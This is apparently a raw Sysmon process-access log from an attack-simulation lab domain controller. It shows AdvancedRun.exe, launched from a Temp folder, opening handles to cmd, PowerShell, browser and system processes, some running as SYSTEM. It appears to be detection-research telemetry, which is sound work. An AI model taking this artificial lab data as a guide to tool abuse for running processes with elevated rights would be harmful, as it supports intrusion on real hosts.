RNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078657Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-12C7-61EB-4508-000000002702}2204C:\Windows\system32\DllHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078656Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C807-000000002702}3452C:\Program Files\OpenJDK\jdk-17.0.1\bin\java.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078655Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.931{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C707-000000002702}2228C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078654Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.929{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-0F7E-61EB-C607-000000002702}2224C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078653Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.929{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F905-000000002702}2420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078652Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.929{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F805-000000002702}2928C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078651Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.927{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-003D-61EB-F705-000000002702}6000C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078650Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.927{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B805-000000002702}4372C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078649Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.927{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE61-61EA-B705-000000002702}5548C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078648Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.926{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-B005-000000002702}108C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078647Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.926{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-FE2D-61EA-AF05-000000002702}5296C:\Windows\System32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM
10341000x80000000000000004078646Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.924{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078645Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078644Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078643Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078642Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004078641Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:12.923{834264DD-14C8-61EB-9608-000000002702}47846032C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+d498|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b69(wow64)|C:\Windows\SYSTEM32\ntdll.dll+61b34(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
